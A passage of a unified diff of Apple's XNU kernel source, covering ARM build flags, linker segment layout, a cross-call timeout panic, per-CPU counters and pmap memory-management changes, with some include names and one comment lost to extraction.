-59,18 +59,18 @@ COMPONENT_LIST = osfmk bsd libkern iokit pexpert libsa security san COMPONENT = $(if $(word 2,$(subst /, ,$(RELATIVE_SOURCE_PATH))),$(word 2,$(subst /, ,$(RELATIVE_SOURCE_PATH))),$(firstword $(subst /, ,$(RELATIVE_SOURCE_PATH)))) COMPONENT_IMPORT_LIST = $(filter-out $(COMPONENT),$(COMPONENT_LIST)) -MACHINE_FLAGS_ARM64_T7000 = -DARM64_BOARD_CONFIG_T7000 -MACHINE_FLAGS_ARM64_T7001 = -DARM64_BOARD_CONFIG_T7001 -MACHINE_FLAGS_ARM64_S8000 = -DARM64_BOARD_CONFIG_S8000 -MACHINE_FLAGS_ARM64_S8001 = -DARM64_BOARD_CONFIG_S8001 +MACHINE_FLAGS_ARM64_T7000 = -DARM64_BOARD_CONFIG_T7000 -mcpu=apple-h7 +MACHINE_FLAGS_ARM64_T7001 = -DARM64_BOARD_CONFIG_T7001 -mcpu=apple-h7 +MACHINE_FLAGS_ARM64_S8000 = -DARM64_BOARD_CONFIG_S8000 -mcpu=apple-h8 +MACHINE_FLAGS_ARM64_S8001 = -DARM64_BOARD_CONFIG_S8001 -mcpu=apple-h8 MACHINE_FLAGS_ARM_T8002 = -DARM_BOARD_CONFIG_T8002 MACHINE_FLAGS_ARM_T8004 = -DARM_BOARD_CONFIG_T8004 MACHINE_FLAGS_ARM64_T8010 = -DARM64_BOARD_CONFIG_T8010 -mcpu=hurricane 
MACHINE_FLAGS_ARM64_T8011 = -DARM64_BOARD_CONFIG_T8011 -mcpu=hurricane MACHINE_FLAGS_ARM64_BCM2837 = -DARM64_BOARD_CONFIG_BCM2837 MACHINE_FLAGS_ARM64_T8020 = -DARM64_BOARD_CONFIG_T8020 -mcpu=vortex -MACHINE_FLAGS_ARM64_T8101 = -DARM64_BOARD_CONFIG_T8101 -D__ARM_ARCH_8_5__=1 -MACHINE_FLAGS_ARM64_T8103 = -DARM64_BOARD_CONFIG_T8103 -D__ARM_ARCH_8_5__=1 +MACHINE_FLAGS_ARM64_T8101 = -DARM64_BOARD_CONFIG_T8101 -mcpu=apple-a14 +MACHINE_FLAGS_ARM64_T8103 = -DARM64_BOARD_CONFIG_T8103 -mcpu=apple-a14 # @@ -575,6 +575,10 @@ LDFLAGS_KERNEL_RELEASEX86_64 = \ -Wl,-sectalign,__HIB,__cstring,0x1000 \ -Wl,-rename_section,__DATA,__const,__DATA_CONST,__const \ -Wl,-segprot,__DATA_CONST,r--,r-- \ + -Wl,-rename_section,__KLD,__const,__KLDDATA,__const \ + -Wl,-rename_section,__KLD,__cstring,__KLDDATA,__cstring \ + -Wl,-segprot,__KLDDATA,rw-,rw- \ + -Wl,-segprot,__KLD,r-x,r-x \ -Wl,-no_zero_fill_sections \ $(LDFLAGS_NOSTRIP_FLAG) @@ -616,7 +620,11 @@ LDFLAGS_KERNEL_GENARM = \ -Wl,-static \ -Wl,-image_base,0x80001000 \ -Wl,-sectalign,__DATA,__const,0x1000 \ - -Wl,-u,___udivmoddi4 + -Wl,-u,___udivmoddi4 \ + -Wl,-rename_section,__KLD,__const,__KLDDATA,__const \ + -Wl,-rename_section,__KLD,__cstring,__KLDDATA,__cstring \ + -Wl,-segprot,__KLDDATA,rw-,rw- \ + -Wl,-segprot,__KLD,r-x,r-x LDFLAGS_KERNEL_RELEASEARM = \ $(LDFLAGS_KERNEL_GENARM) \ @@ -685,6 +693,10 @@ LDFLAGS_KERNEL_GENARM64 = \ -Wl,-rename_section,__DATA,__auth_got,__DATA_CONST,__auth_got \ -Wl,-rename_section,__DATA,__const,__DATA_CONST,__const \ -Wl,-segprot,__DATA_CONST,r--,r-- \ + -Wl,-rename_section,__KLD,__const,__KLDDATA,__const \ + -Wl,-rename_section,__KLD,__cstring,__KLDDATA,__cstring \ + -Wl,-segprot,__KLDDATA,rw-,rw- \ + -Wl,-segprot,__KLD,r-x,r-x \ -Wl,-rename_section,__TEXT,__text,__TEXT_EXEC,__text \ -Wl,-rename_section,__TEXT,__stubs,__TEXT_EXEC,__stubs \ -Wl,-sectcreate,"__PLK_TEXT_EXEC",__text,/dev/null \ @@ -695,8 +707,8 @@ LDFLAGS_KERNEL_GENARM64 = \ LDFLAGS_KERNEL_SEGARM64 = \ 
-Wl,-rename_section,__PPLDATA,__const,__PPLDATA_CONST,__const \ - -Wl,-segment_order,__TEXT:__DATA_CONST:__LINKEDIT:__TEXT_EXEC:__PPLTEXT:__PPLTRAMP:__PPLDATA_CONST:__LASTDATA_CONST:__LAST:__PPLDATA:__KLD:__DATA:__HIBDATA:__BOOTDATA \ - -Wl,-segprot,__PPLTEXT,r-x,r-x -Wl,-segprot,__PPLTRAMP,r-x,r-x -Wl,-segprot,__PPLDATA_CONST,r--,r-- -Wl,-segprot,__LASTDATA_CONST,r--,r-- -Wl,-segprot,__LAST,r-x,r-x + -Wl,-segment_order,__TEXT:__DATA_CONST:__LINKEDIT:__TEXT_EXEC:__KLD:__PPLTEXT:__PPLTRAMP:__PPLDATA_CONST:__LASTDATA_CONST:__LAST:__PPLDATA:__KLDDATA:__DATA:__HIBDATA:__BOOTDATA \ + -Wl,-segprot,__PPLTEXT,r-x,r-x -Wl,-segprot,__PPLTRAMP,r-x,r-x -Wl,-segprot,__PPLDATA_CONST,r--,r-- -Wl,-segprot,__LASTDATA_CONST,r--,r-- -Wl,-segprot,__LAST,r-x,r-x \ LDFLAGS_KERNEL_RELEASEARM64 = \ $(LDFLAGS_KERNEL_GENARM64) \ diff --git a/osfmk/UserNotification/KUNCUserNotifications.c b/osfmk/UserNotification/KUNCUserNotifications.c index ae727ba02..59300b656 100644 --- a/osfmk/UserNotification/KUNCUserNotifications.c +++ b/osfmk/UserNotification/KUNCUserNotifications.c @@ -49,6 +49,7 @@ #include #endif +#if CONFIG_USER_NOTIFICATION /* * DEFINES AND STRUCTURES */ @@ -409,6 +410,7 @@ convert_port_to_UNDReply( } return UND_REPLY_NULL; } +#endif /* * User interface for setting the host UserNotification Daemon port. 
@@ -419,7 +421,12 @@ host_set_UNDServer( host_priv_t host_priv, UNDServerRef server) { +#if CONFIG_USER_NOTIFICATION return host_set_user_notification_port(host_priv, server); +#else +#pragma unused(host_priv, server) + return KERN_NOT_SUPPORTED; +#endif } /* @@ -431,5 +438,10 @@ host_get_UNDServer( host_priv_t host_priv, UNDServerRef *serverp) { +#if CONFIG_USER_NOTIFICATION return host_get_user_notification_port(host_priv, serverp); +#else +#pragma unused(host_priv, serverp) + return KERN_NOT_SUPPORTED; +#endif } diff --git a/osfmk/arm/arm_init.c b/osfmk/arm/arm_init.c index 44610bf50..8fadbf4e7 100644 --- a/osfmk/arm/arm_init.c +++ b/osfmk/arm/arm_init.c @@ -124,6 +124,14 @@ uint64_t interrupt_masked_timeout = 0xd0000; uint64_t stackshot_interrupt_masked_timeout = 0xf9999; #endif +/* + * A 6-second timeout will give the watchdog code a chance to run + * before a panic is triggered by the xcall routine. + */ +#define XCALL_ACK_TIMEOUT_NS ((uint64_t) 6000000000) +uint64_t xcall_ack_timeout_abstime; + + boot_args const_boot_args __attribute__((section("__DATA, __const"))); boot_args *BootArgs __attribute__((section("__DATA, __const"))); @@ -146,6 +154,8 @@ SECURITY_READ_ONLY_LATE(boolean_t) diversify_user_jop = TRUE; SECURITY_READ_ONLY_LATE(uint64_t) gDramBase; SECURITY_READ_ONLY_LATE(uint64_t) gDramSize; +SECURITY_READ_ONLY_LATE(bool) serial_console_enabled = false; + /* * Forward definition */ @@ -435,7 +445,11 @@ arm_init( } PE_parse_boot_argn("interrupt_masked_debug_timeout", &interrupt_masked_timeout, sizeof(interrupt_masked_timeout)); -#endif + +#endif /* INTERRUPT_MASKED_DEBUG */ + + nanoseconds_to_absolutetime(XCALL_ACK_TIMEOUT_NS, &xcall_ack_timeout_abstime); + #if HAS_BP_RET PE_parse_boot_argn("bpret", &bp_ret, sizeof(bp_ret)); @@ -496,6 +510,7 @@ arm_init( } if (serialmode & SERIALMODE_OUTPUT) { /* Start serial if requested */ + serial_console_enabled = true; (void)switch_to_serial_console(); /* Switch into serial mode */ disableConsoleOutput = FALSE; /* 
Allow printfs to happen */ } diff --git a/osfmk/arm/arm_vm_init.c b/osfmk/arm/arm_vm_init.c index 35f66e5ee..faf5013e2 100644 --- a/osfmk/arm/arm_vm_init.c +++ b/osfmk/arm/arm_vm_init.c @@ -111,6 +111,8 @@ vm_offset_t segLINKB; static unsigned long segSizeLINK; static vm_offset_t segKLDB; static unsigned long segSizeKLD; +static vm_offset_t segKLDDATAB; +static unsigned long segSizeKLDDATA; static vm_offset_t segLASTB; static vm_offset_t segLASTDATACONSTB; static unsigned long segSizeLASTDATACONST; @@ -330,6 +332,7 @@ arm_vm_prot_init(boot_args * args) arm_vm_page_granular_RNX((vm_offset_t)&fiqstack_high_guard, PAGE_MAX_SIZE, TRUE); arm_vm_page_granular_ROX(segKLDB, segSizeKLD, force_coarse_physmap); + arm_vm_page_granular_RNX(segKLDDATAB, segSizeKLDDATA, force_coarse_physmap); arm_vm_page_granular_RWNX(segLINKB, segSizeLINK, force_coarse_physmap); arm_vm_page_granular_RWNX(segLASTB, segSizeLAST, FALSE); // __LAST may be empty, but we cannot assume this if (segLASTDATACONSTB) { @@ -481,6 +484,7 @@ arm_vm_init(uint64_t memory_size, boot_args * args) segDATAB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__DATA", &segSizeDATA); segLINKB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__LINKEDIT", &segSizeLINK); segKLDB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__KLD", &segSizeKLD); + segKLDDATAB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__KLDDATA", &segSizeKLDDATA); segLASTB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__LAST", &segSizeLAST); segLASTDATACONSTB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__LASTDATA_CONST", &segSizeLASTDATACONST); segPRELINKTEXTB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__PRELINK_TEXT", &segSizePRELINKTEXT); diff --git a/osfmk/arm/bsd_arm.c b/osfmk/arm/bsd_arm.c index ef4fe3d84..084d863a9 100644 --- a/osfmk/arm/bsd_arm.c +++ b/osfmk/arm/bsd_arm.c @@ -34,7 +34,6 @@ #include #include -#include #include #include #include diff --git 
a/osfmk/arm/counter.c b/osfmk/arm/counter.c new file mode 100644 index 000000000..552e53813 --- /dev/null +++ b/osfmk/arm/counter.c @@ -0,0 +1,81 @@ +/* * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. 
+ * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#include +#include +#include +#include +#include +#include +#include + +OS_OVERLOADABLE +void +counter_add(scalable_counter_t *counter, uint64_t amount) +{ + os_atomic_add(zpercpu_get(*counter), amount, relaxed); +} + +OS_OVERLOADABLE +void +counter_inc(scalable_counter_t *counter) +{ + os_atomic_inc(zpercpu_get(*counter), relaxed); +} + +OS_OVERLOADABLE +void +counter_dec(scalable_counter_t *counter) +{ + os_atomic_dec(zpercpu_get(*counter), relaxed); +} + +/* + * NB: On arm, the preemption disabled implementation is the same as + * the normal implementation. Otherwise we would need to enforce that + * callers never mix the interfaces for the same counter. + */ +OS_OVERLOADABLE +void +counter_add_preemption_disabled(scalable_counter_t *counter, uint64_t amount) +{ + counter_add(counter, amount); +} + +OS_OVERLOADABLE +void +counter_inc_preemption_disabled(scalable_counter_t *counter) +{ + counter_inc(counter); +} + +OS_OVERLOADABLE +void +counter_dec_preemption_disabled(scalable_counter_t *counter) +{ + counter_dec(counter); +} diff --git a/osfmk/arm/cpu_capabilities.h b/osfmk/arm/cpu_capabilities.h index 738e94f02..dc5d2d20e 100644 --- a/osfmk/arm/cpu_capabilities.h +++ b/osfmk/arm/cpu_capabilities.h @@ -158,6 +158,10 @@ _Static_assert((_COMM_PAGE64_BASE_ADDRESS >= _COMM_PAGE64_NESTING_START) && "region probably needs to be updated."); #else /* KERNEL_PRIVATE */ +/* + * defines a couple of conveniency macros + * to help read data from the commpage. 
+ */ #define _COMM_PAGE_AREA_LENGTH (4096) #define _COMM_PAGE_BASE_ADDRESS _COMM_PAGE64_BASE_ADDRESS diff --git a/osfmk/arm/cpu_common.c b/osfmk/arm/cpu_common.c index 11ad96d9e..faa3b1e80 100644 --- a/osfmk/arm/cpu_common.c +++ b/osfmk/arm/cpu_common.c @@ -62,13 +62,15 @@ vm_address_t percpu_base_cur; cpu_data_t PERCPU_DATA(cpu_data); cpu_data_entry_t CpuDataEntries[MAX_CPUS]; -static lck_grp_t cpu_lck_grp; -static lck_rw_t cpu_state_lock; +static LCK_GRP_DECLARE(cpu_lck_grp, "cpu_lck_grp"); +static LCK_RW_DECLARE(cpu_state_lock, &cpu_lck_grp); unsigned int real_ncpus = 1; boolean_t idle_enable = FALSE; uint64_t wake_abstime = 0x0ULL; +extern uint64_t xcall_ack_timeout_abstime; + #if defined(HAS_IPI) extern unsigned int gFastIPI; #endif /* defined(HAS_IPI) */ @@ -427,6 +429,11 @@ cpu_signal_internal(cpu_data_t *target_proc, } if ((signal == SIGPxcall) || (signal == SIGPxcallImm)) { + uint64_t start_mabs_time, max_mabs_time, current_mabs_time; + current_mabs_time = start_mabs_time = mach_absolute_time(); + max_mabs_time = xcall_ack_timeout_abstime + current_mabs_time; + assert(max_mabs_time > current_mabs_time); + do { current_signals = target_proc->cpu_signal; if ((current_signals & SIGPdisabled) == SIGPdisabled) { @@ -447,7 +454,20 @@ cpu_signal_internal(cpu_data_t *target_proc, if (!swap_success && (current_proc->cpu_signal & signal)) { cpu_handle_xcall(current_proc); } - } while (!swap_success); + } while (!swap_success && ((current_mabs_time = mach_absolute_time()) < max_mabs_time)); + + /* + * If we time out while waiting for the target CPU to respond, it's possible that no + * other CPU is available to handle the watchdog interrupt that would eventually trigger + * a panic. To prevent this from happening, we just panic here to flag this condition. 
+ */ + if (__improbable(current_mabs_time >= max_mabs_time)) { + uint64_t end_time_ns, xcall_ack_timeout_ns; + absolutetime_to_nanoseconds(current_mabs_time - start_mabs_time, &end_time_ns); + absolutetime_to_nanoseconds(xcall_ack_timeout_abstime, &xcall_ack_timeout_ns); + panic("CPU%u has failed to respond to cross-call after %llu nanoseconds (timeout = %llu ns)", + target_proc->cpu_number, end_time_ns, xcall_ack_timeout_ns); + } if (signal == SIGPxcallImm) { target_proc->cpu_imm_xcall_p0 = p0; @@ -825,13 +845,6 @@ ml_cpu_can_exit(__unused int cpu_id) return false; } -void -ml_cpu_init_state(void) -{ - lck_grp_init(&cpu_lck_grp, "cpu_lck_grp", LCK_GRP_ATTR_NULL); - lck_rw_init(&cpu_state_lock, &cpu_lck_grp, LCK_ATTR_NULL); -} - #ifdef USE_APPLEARMSMP void diff --git a/osfmk/arm/cpu_data_internal.h b/osfmk/arm/cpu_data_internal.h index d9343a0e3..a0648dc3d 100644 --- a/osfmk/arm/cpu_data_internal.h +++ b/osfmk/arm/cpu_data_internal.h @@ -72,7 +72,7 @@ static_assert(sizeof(cpumap_t) * CHAR_BIT >= MAX_CPUS, "cpumap_t bitvector is to #define CPUWINDOWS_BASE (VM_MAX_KERNEL_ADDRESS & CPUWINDOWS_BASE_MASK) #define CPUWINDOWS_TOP (CPUWINDOWS_BASE + (MAX_CPUS * CPUWINDOWS_MAX * ARM_PGBYTES)) -static_assert((CPUWINDOWS_BASE >= VM_MIN_KERNEL_ADDRESS) && (CPUWINDOWS_TOP <= VM_MAX_KERNEL_ADDRESS), +static_assert((CPUWINDOWS_BASE >= VM_MIN_KERNEL_ADDRESS) && ((CPUWINDOWS_TOP - 1) <= VM_MAX_KERNEL_ADDRESS), "CPU copy windows too large for CPUWINDOWS_BASE_MASK value"); typedef struct cpu_data_entry { diff --git a/osfmk/arm/locks_arm.c b/osfmk/arm/locks_arm.c index 98fd21b3a..8246489dc 100644 --- a/osfmk/arm/locks_arm.c +++ b/osfmk/arm/locks_arm.c @@ -512,7 +512,7 @@ lck_spin_init( /* * arm_usimple_lock is a lck_spin_t without a group or attributes */ -void inline +MARK_AS_HIBERNATE_TEXT void inline arm_usimple_lock_init(simple_lock_t lck, __unused unsigned short initial_value) { lck->type = LCK_SPIN_TYPE; diff --git a/osfmk/arm/machine_routines.c b/osfmk/arm/machine_routines.c 
index 145a783d3..072ed38c2 100644 --- a/osfmk/arm/machine_routines.c +++ b/osfmk/arm/machine_routines.c @@ -166,6 +166,17 @@ ml_init_lock_timeout(void) high_MutexSpin = low_MutexSpin; } +/* + * This is called when all of the ml_processor_info_t structures have been + * initialized and all the processors have been started through processor_start(). + * + * Required by the scheduler subsystem. + */ +void +ml_cpu_init_completed(void) +{ +} + /* * This is called from the machine-independent routine cpu_up() * to perform machine-dependent info updates. diff --git a/osfmk/arm/machine_routines.h b/osfmk/arm/machine_routines.h index 22cb5a66f..ce2d3cb27 100644 --- a/osfmk/arm/machine_routines.h +++ b/osfmk/arm/machine_routines.h @@ -301,9 +301,6 @@ cluster_type_t ml_get_boot_cluster(void); * @field coresight_regs IO-mapped virtual address of CoreSight debug register block. * @field coresight_pa Physical address of CoreSight register block. * @field coresight_len Length of CoreSight register block. - * @field self_ipi_irq AIC IRQ vector for self IPI (cpuX->cpuX). 0 if unsupported. - * @field other_ipi_irq AIC IRQ vector for other IPI (cpuX->cpuY). 0 if unsupported. - * @field pmi_irq AIC IRQ vector for performance management IRQ. 0 if unsupported. 
* @field die_cluster_id Cluster ID within the local die (EDT: die-cluster-id) * @field cluster_core_id Core ID within the local cluster (EDT: cluster-core-id) */ @@ -327,9 +324,6 @@ typedef struct ml_topology_cpu { vm_offset_t coresight_regs; uint64_t coresight_pa; uint64_t coresight_len; - int self_ipi_irq; - int other_ipi_irq; - int pmi_irq; unsigned int die_cluster_id; unsigned int cluster_core_id; } ml_topology_cpu_t; @@ -683,6 +677,11 @@ uint64_t ml_get_timebase_entropy(void); void ml_init_lock_timeout(void); +#if __arm64__ +uint64_t virtual_timeout_inflate_ns(unsigned int vti, uint64_t timeout); +uint64_t virtual_timeout_inflate_abs(unsigned int vti, uint64_t timeout); +#endif + boolean_t ml_delay_should_spin(uint64_t interval); void ml_delay_on_yield(void); @@ -775,6 +774,7 @@ vm_map_offset_t ml_get_max_offset( #define MACHINE_MAX_OFFSET_DEVICE 0x08 #endif +extern void ml_cpu_init_completed(void); extern void ml_cpu_up(void); extern void ml_cpu_down(void); extern void ml_arm_sleep(void); diff --git a/osfmk/arm/machine_routines_apple.c b/osfmk/arm/machine_routines_apple.c index 0c5617c30..18031f83b 100644 --- a/osfmk/arm/machine_routines_apple.c +++ b/osfmk/arm/machine_routines_apple.c @@ -56,12 +56,20 @@ configure_misc_apple_regs(void) #endif /* __arm64__ */ #if HAS_APPLE_PAC + + +/** + * Returns the default ROP key. + */ uint64_t ml_default_rop_pid(void) { return 0; } +/** + * Returns the default JOP key. 
+ */ uint64_t ml_default_jop_pid(void) { diff --git a/osfmk/arm/machine_routines_common.c b/osfmk/arm/machine_routines_common.c index f7fca614b..aa60dd3fe 100644 --- a/osfmk/arm/machine_routines_common.c +++ b/osfmk/arm/machine_routines_common.c @@ -526,6 +526,7 @@ machine_thread_group_init(struct thread_group *tg) data.thread_group_id = thread_group_get_id(tg); data.thread_group_data = thread_group_get_machine_data(tg); data.thread_group_size = thread_group_machine_data_size(); + data.thread_group_flags = thread_group_get_flags(tg); sched_perfcontrol_thread_group_init(&data); } @@ -539,6 +540,7 @@ machine_thread_group_deinit(struct thread_group *tg) data.thread_group_id = thread_group_get_id(tg); data.thread_group_data = thread_group_get_machine_data(tg); data.thread_group_size = thread_group_machine_data_size(); + data.thread_group_flags = thread_group_get_flags(tg); sched_perfcontrol_thread_group_deinit(&data); } diff --git a/osfmk/arm/model_dep.c b/osfmk/arm/model_dep.c index b7cead5fa..053fe3a94 100644 --- a/osfmk/arm/model_dep.c +++ b/osfmk/arm/model_dep.c @@ -1148,6 +1148,10 @@ DebuggerXCall( INTERRUPT_MASKED_DEBUG_START(current_thread()->machine.int_handler_addr, current_thread()->machine.int_type); } +#if defined(__arm64__) + current_thread()->machine.kpcb = NULL; +#endif /* defined(__arm64__) */ + /* Any cleanup for our pushed context should go here */ } diff --git a/osfmk/arm/pmap.c b/osfmk/arm/pmap.c index 4719ce5b8..60eb475d2 100644 --- a/osfmk/arm/pmap.c +++ b/osfmk/arm/pmap.c @@ -130,7 +130,6 @@ extern u_int32_t random(void); /* from */ static bool alloc_asid(pmap_t pmap); static void free_asid(pmap_t pmap); static void flush_mmu_tlb_region_asid_async(vm_offset_t va, size_t length, pmap_t pmap); -static void flush_mmu_tlb_tte_asid_async(vm_offset_t va, pmap_t pmap); static void flush_mmu_tlb_full_asid_async(pmap_t pmap); static pt_entry_t wimg_to_pte(unsigned int wimg); @@ -138,7 +137,6 @@ struct page_table_ops { bool (*alloc_id)(pmap_t pmap); void 
(*free_id)(pmap_t pmap); void (*flush_tlb_region_async)(vm_offset_t va, size_t length, pmap_t pmap); - void (*flush_tlb_tte_async)(vm_offset_t va, pmap_t pmap); void (*flush_tlb_async)(pmap_t pmap); pt_entry_t (*wimg_to_pte)(unsigned int wimg); }; @@ -148,7 +146,6 @@ static const struct page_table_ops native_pt_ops = .alloc_id = alloc_asid, .free_id = free_asid, .flush_tlb_region_async = flush_mmu_tlb_region_asid_async, - .flush_tlb_tte_async = flush_mmu_tlb_tte_asid_async, .flush_tlb_async = flush_mmu_tlb_full_asid_async, .wimg_to_pte = wimg_to_pte, }; @@ -599,6 +596,12 @@ pt_attr_leaf_xn(__unused const pt_attr_t * const pt_attr) return ARM_PTE_NX; } +static inline uintptr_t +pt_attr_leaf_x(__unused const pt_attr_t * const pt_attr) +{ + return ARM_PTE_PNX; +} + __unused static inline uintptr_t pt_attr_ln_offmask(__unused const pt_attr_t * const pt_attr, unsigned int level) { @@ -861,7 +864,7 @@ struct pmap kernel_pmap_store MARK_AS_PMAP_DATA; SECURITY_READ_ONLY_LATE(pmap_t) kernel_pmap = &kernel_pmap_store; struct vm_object pmap_object_store VM_PAGE_PACKED_ALIGNED; /* store pt pages */ -vm_object_t pmap_object = &pmap_object_store; +SECURITY_READ_ONLY_LATE(vm_object_t) pmap_object = &pmap_object_store; static SECURITY_READ_ONLY_LATE(zone_t) pmap_zone; /* zone of pmap structures */ @@ -1791,6 +1794,7 @@ pmap_ledger_validate(void * ledger) * Trace levels are controlled by a bitmask in which each * level can be enabled/disabled by the (1< 7) /* * The low global vector page is mapped at a fixed alias. 
@@ -2410,20 +2431,26 @@ const void * __ptrauth_ppl_handler const ppl_handler_table[PMAP_COUNT] = { [PMAP_IS_TRUST_CACHE_LOADED_INDEX] = pmap_is_trust_cache_loaded_internal, [PMAP_LOOKUP_IN_STATIC_TRUST_CACHE_INDEX] = pmap_lookup_in_static_trust_cache_internal, [PMAP_LOOKUP_IN_LOADED_TRUST_CACHES_INDEX] = pmap_lookup_in_loaded_trust_caches_internal, + [PMAP_SET_COMPILATION_SERVICE_CDHASH_INDEX] = pmap_set_compilation_service_cdhash_internal, + [PMAP_MATCH_COMPILATION_SERVICE_CDHASH_INDEX] = pmap_match_compilation_service_cdhash_internal, [PMAP_TRIM_INDEX] = pmap_trim_internal, [PMAP_LEDGER_ALLOC_INIT_INDEX] = pmap_ledger_alloc_init_internal, [PMAP_LEDGER_ALLOC_INDEX] = pmap_ledger_alloc_internal, [PMAP_LEDGER_FREE_INDEX] = pmap_ledger_free_internal, -#if HAS_APPLE_PAC && XNU_MONITOR +#if HAS_APPLE_PAC [PMAP_SIGN_USER_PTR] = pmap_sign_user_ptr_internal, [PMAP_AUTH_USER_PTR] = pmap_auth_user_ptr_internal, -#endif /* HAS_APPLE_PAC && XNU_MONITOR */ +#endif /* HAS_APPLE_PAC */ #if __ARM_RANGE_TLBI__ [PHYS_ATTRIBUTE_CLEAR_RANGE_INDEX] = phys_attribute_clear_range_internal, #endif /* __ARM_RANGE_TLBI__ */ #if __has_feature(ptrauth_calls) && defined(XNU_TARGET_OS_OSX) [PMAP_DISABLE_USER_JOP_INDEX] = pmap_disable_user_jop_internal, #endif /* __has_feature(ptrauth_calls) && defined(XNU_TARGET_OS_OSX) */ + +#if DEVELOPMENT || DEBUG + [PMAP_TEST_TEXT_CORRUPTION_INDEX] = pmap_test_text_corruption_internal, +#endif /* DEVELOPMENT || DEBUG */ }; #endif @@ -2528,6 +2555,64 @@ pmap_get_cpu_data(void) return pmap_cpu_data; } +#if __arm64__ +/* + * Disable interrupts and return previous state. + * + * The PPL has its own interrupt state facility separate from + * ml_set_interrupts_enable(), since that function is not part of the + * PPL, and so does things like manipulating untrusted data and + * taking ASTs. + * + * @return The previous interrupt state, to be restored with + * pmap_interrupts_restore().
+ */ +static uint64_t __attribute__((warn_unused_result)) __used +pmap_interrupts_disable(void) +{ + uint64_t state = __builtin_arm_rsr64("DAIF"); + + if ((state & DAIF_STANDARD_DISABLE) != DAIF_STANDARD_DISABLE) { + __builtin_arm_wsr64("DAIFSet", DAIFSC_STANDARD_DISABLE); + } + + return state; +} + +/* + * Restore previous interrupt state. + * + * @param state The previous interrupt state to restore. + */ +static void __used +pmap_interrupts_restore(uint64_t state) +{ + // no unknown bits? + assert((state & ~DAIF_ALL) == 0); + + if (state != DAIF_STANDARD_DISABLE) { + __builtin_arm_wsr64("DAIF", state); + } +} + +/* + * Query interrupt state. + * + * ml_get_interrupts_enabled() is safe enough at the time of writing + * this comment, but because it is not considered part of the PPL, and so + * could change without notice, and because it presently only checks + * DAIF_IRQ, we have our own version. + * + * @return true if interrupts are enabled (not fully disabled). + */ + +static bool __attribute__((warn_unused_result)) __used +pmap_interrupts_enabled(void) +{ + return (__builtin_arm_rsr64("DAIF") & DAIF_STANDARD_DISABLE) != DAIF_STANDARD_DISABLE; +} +#endif /* __arm64__ */ + #if XNU_MONITOR /* * pmap_set_range_xprr_perm takes a range (specified using start and end) that @@ -2786,14 +2871,12 @@ pmap_pages_reclaim( pmap_simple_unlock(&pt_pages_lock); return (pmap_paddr_t)0; } else { - int remove_count = 0; bool need_strong_sync = false; vm_map_address_t va; pmap_t pmap; pt_entry_t *bpte, *epte; pt_entry_t *pte_p; tt_entry_t *tte_p; - uint32_t rmv_spte = 0; pmap_simple_unlock(&pt_pages_lock); pmap = ptdp->pmap; @@ -2828,25 +2911,19 @@ pmap_pages_reclaim( * which could cause the counter to drift * more and more.
*/ - remove_count += pmap_remove_range_options( - pmap, va, bpte, epte, - &rmv_spte, &need_strong_sync, PMAP_OPTIONS_REMOVE); + pmap_remove_range_options( + pmap, va, bpte, epte, NULL, + &need_strong_sync, PMAP_OPTIONS_REMOVE); if (ptd_get_info(ptdp, pte_p)->refcnt != 0) { panic("%s: ptdp %p, count %d", __FUNCTION__, ptdp, ptd_get_info(ptdp, pte_p)->refcnt); } - pmap_tte_deallocate(pmap, tte_p, pt_attr_twig_level(pt_attr)); - - if (remove_count > 0) { - pmap_get_pt_ops(pmap)->flush_tlb_region_async(va, (size_t)pt_attr_leaf_table_size(pt_attr), pmap); - } else { - pmap_get_pt_ops(pmap)->flush_tlb_tte_async(va, pmap); - } + pmap_tte_deallocate(pmap, va, va + (size_t)pt_attr_leaf_table_size(pt_attr), need_strong_sync, + tte_p, pt_attr_twig_level(pt_attr)); } } // Undo the lock we grabbed when we found ptdp above pmap_unlock(pmap); - pmap_sync_tlb(need_strong_sync); } pmap_simple_lock(&pmap_pages_lock); } @@ -3259,21 +3336,22 @@ pmap_pages_free( pmap_paddr_t pa, unsigned size) { - pmap_simple_lock(&pmap_pages_lock); - - if (pmap_pages_request_count != 0) { + if (__improbable(pmap_pages_request_count != 0)) { page_free_entry_t *page_entry; - pmap_pages_request_count--; - page_entry = (page_free_entry_t *)phystokv(pa); - page_entry->next = pmap_pages_reclaim_list; - pmap_pages_reclaim_list = page_entry; - pmap_simple_unlock(&pmap_pages_lock); + pmap_simple_lock(&pmap_pages_lock); - return; - } + if (pmap_pages_request_count != 0) { + pmap_pages_request_count--; + page_entry = (page_free_entry_t *)phystokv(pa); + page_entry->next = pmap_pages_reclaim_list; + pmap_pages_reclaim_list = page_entry; + pmap_simple_unlock(&pmap_pages_lock); + return; + } - pmap_simple_unlock(&pmap_pages_lock); + pmap_simple_unlock(&pmap_pages_lock); + } #if XNU_MONITOR (void)size; @@ -5045,10 +5123,178 @@ pmap_virtual_region( return ret; } +/* + * Routines to track and allocate physical pages during early boot. 
